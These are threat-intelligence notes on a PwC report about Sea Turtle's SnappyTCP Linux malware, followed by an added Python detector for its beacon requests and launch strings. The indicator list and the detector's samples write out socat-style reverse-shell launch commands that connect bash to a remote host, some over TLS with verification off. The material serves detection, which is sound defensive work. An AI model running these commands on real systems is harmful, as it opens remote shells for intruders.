The Tortoise and The Malwahare
by PwC Threat Intelligence
December 5, 2023
https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html
| Notes |
|---|
| threat intelligence |
| Sea Turtle |
| Teal Kurma |
| SnappyTCP |
| reverse shell |
| Linux malware |
| Unix |
| Turkey |
| Marbled Dust |
| Cosmic Wolf |
| Europe |
| Middle East |
| non-governmental organizations (NGO) |
| telecommunications |
| command and control |
| persistence |
| TLS |
| plaintext |
| GitHub |
| attacker stored code on GitHub/reused public examples https://github.com/jacksp7 |
| DNS |
| DNS hijacking |
| CVE-2021-44228 |
| CVE-2021-21974 |
| CVE-2022-0847 |
| upxa.sh |
| dropper |
| webshell |
| hxxp://lo0[.]systemctl[.]network/sy.php |
| GET /sy.php HTTP/1.1\r\nHost: %s\r\nHostname: %s\r\n\r\n (format string; both %s are filled from host_name) |
| Greek CERT |
| CERT |
| X-Auth-43245-S-20 |
| bash -c \"./kdd_launch exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%d 2>&1>/dev/null&\" |
| OpenSSL |
| GET /ssl.php HTTP/1.1\r\nHost: %s\r\nHostname: %s\r\nConnection: close\r\n\r\n |
| bash -c \"./update exec:'bash -li',pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\" |
| GLIBC - GNU C library |
| static linking |
| cross compiling |
| pthreads |
| bash |
| ESXi OpenSLP heap overflow |
| passive DNS |
| cyberespionage |
| exfiltration |
| victimology |
| threat actor |
| APT |
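The beacon format strings (GET /sy.php and /ssl.php with a non-standard Hostname header) and the two socat-style launch commands (exec:'bash -li',pty,stderr,setsid,sigint,sane followed by a tcp: or OPENSSL:...,verify=0 target) noted above are concrete enough to turn into a simple check. The Python below is an added example written for these notes, not code from the PwC article or from the malware itself. The sample requests, response and command lines are constructed for the example; the C2 address 203.0.113.10 is a documentation address; treating X-Auth-43245-S-20 as a header in either direction is an assumption (the notes list the string without saying which side sends it), as is accepting any launcher binary name rather than only ./kdd_launch and ./update.

```python
import re

# Added example for these notes (not PwC's code, not the malware's): match the
# SnappyTCP beacon request and the reverse-shell launch strings recorded above.
# All sample requests, responses and command lines below are constructed for
# the example; 203.0.113.10 is a documentation address, not a real C2.

BEACON_PATHS = {"/sy.php", "/ssl.php"}
AUTH_HEADER = "X-Auth-43245-S-20"

# The launch strings use socat's exec:...,pty,stderr,setsid,sigint,sane syntax
# followed by a tcp:host:port or OPENSSL:host:port,verify=0 target. Straight and
# curly quotes (\u2018 \u2019) are both accepted because the notes show curly ones.
# Assumption: the launcher binary (./kdd_launch, ./update) may have any name.
LAUNCH_RE = re.compile(
    r"exec:['\u2018]bash -li['\u2019],pty,stderr,setsid,sigint,sane\s+"
    r"(?P<transport>tcp|OPENSSL):(?P<host>[^:\s,]+):(?P<port>\d+)(?P<opts>,verify=0)?",
    re.IGNORECASE,
)


def parse_http_message(raw: str):
    """Split a raw HTTP/1.x request or response into (start_line, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify_http(raw: str) -> list:
    """Return the indicator names a raw HTTP message matches ([] means clean)."""
    hits = []
    start, headers = parse_http_message(raw)
    parts = start.split(" ")
    # Beacon from the notes: GET /sy.php or /ssl.php carrying a Hostname header
    # (non-standard) next to the usual Host header.
    if len(parts) == 3 and parts[0] == "GET" and parts[1] in BEACON_PATHS \
            and "hostname" in headers:
        hits.append("snappytcp-beacon")
        # The format string fills Host and Hostname from the same variable.
        if headers.get("host") == headers["hostname"]:
            hits.append("host-equals-hostname")
    # Assumption: X-Auth-43245-S-20 is checked as a header in either direction.
    if AUTH_HEADER.lower() in headers:
        hits.append("x-auth-header")
    return hits


def classify_cmdline(cmdline: str):
    """Match the socat-style reverse-shell launch string; returns a dict with
    transport, host, port and whether TLS verification is disabled, or None."""
    m = LAUNCH_RE.search(cmdline)
    if not m:
        return None
    return {
        "transport": m.group("transport").lower(),
        "host": m.group("host"),
        "port": int(m.group("port")),
        "tls_unverified": m.group("opts") is not None,
    }


# Constructed samples in the shape of the strings recorded in the notes.
SAMPLE_HTTP = [
    "GET /sy.php HTTP/1.1\r\nHost: victim-host\r\nHostname: victim-host\r\n\r\n",
    "GET /ssl.php HTTP/1.1\r\nHost: victim-host\r\nHostname: victim-host\r\n"
    "Connection: close\r\n\r\n",
    # benign request to the same path name, no Hostname header
    "GET /sy.php HTTP/1.1\r\nHost: example.test\r\nUser-Agent: curl/8.0\r\n\r\n",
    # constructed response carrying the header (assumed direction)
    "HTTP/1.1 200 OK\r\nX-Auth-43245-S-20: 1\r\nContent-Length: 0\r\n\r\n",
]
SAMPLE_CMDLINES = [
    "bash -c \"./kdd_launch exec:'bash -li',pty,stderr,setsid,sigint,sane "
    "tcp:203.0.113.10:443 2>&1>/dev/null&\"",
    "bash -c \"./update exec:'bash -li',pty,stderr,setsid,sigint,sane "
    "OPENSSL:203.0.113.10:443,verify=0 2>&1>/dev/null&\"",
    "bash -c \"./update --check\"",  # benign command with the same binary name
]


def scan_samples():
    """Run both checks over the constructed samples."""
    return ([classify_http(m) for m in SAMPLE_HTTP],
            [classify_cmdline(c) for c in SAMPLE_CMDLINES])


if __name__ == "__main__":
    http_hits, cmd_hits = scan_samples()
    for msg, hit in zip(SAMPLE_HTTP, http_hits):
        print(msg.split("\r\n")[0], "->", hit or "clean")
    for cmd, hit in zip(SAMPLE_CMDLINES, cmd_hits):
        print(cmd[:40], "->", hit or "clean")
```

The HTTP check keys on the Hostname header rather than on the path alone, since /sy.php and /ssl.php are ordinary file names; the command-line check keys on the full socat option list so that a legitimate ./update invocation does not fire.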